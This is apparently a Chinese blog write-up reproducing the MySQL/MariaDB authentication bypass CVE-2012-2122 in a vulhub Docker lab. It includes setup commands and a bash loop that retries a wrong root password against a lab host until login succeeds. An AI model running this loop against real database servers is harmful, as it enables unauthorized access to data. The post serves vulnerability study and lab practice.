Mysql 身份认证绕过漏洞(CVE-2012-2122)

环境搭建 漏洞复现 网络安全 vulhub CVE sql
漏洞复现
发布日期:   2022-06-10
文章字数:   255
阅读次数:  

Mysql身份认证绕过漏洞

漏洞简述

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

影响版本

  • MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
  • MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

环境搭建

cd vulhub/mysql/CVE-2012-2122
docker-compose up -d

复现测试

打开kali

用正常方式打开mysql,发现可以正常登录

mysql -uroot -p123456 -h 192.168.3.151

image-20220610090707580

在不知道环境正确密码的情况下,在一定数量尝试后可以登录

for i in `seq 1 1000`;do mysql -uroot -proot -h 192.168.3.151 ;done

image-20220610090945473

结束!

文章作者: Broken-year
文章链接: http://Broken-year.github.io/2022/06/10/mysql-Authentication-bypass/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
环境搭建 漏洞复现 网络安全 vulhub CVE sql
  目录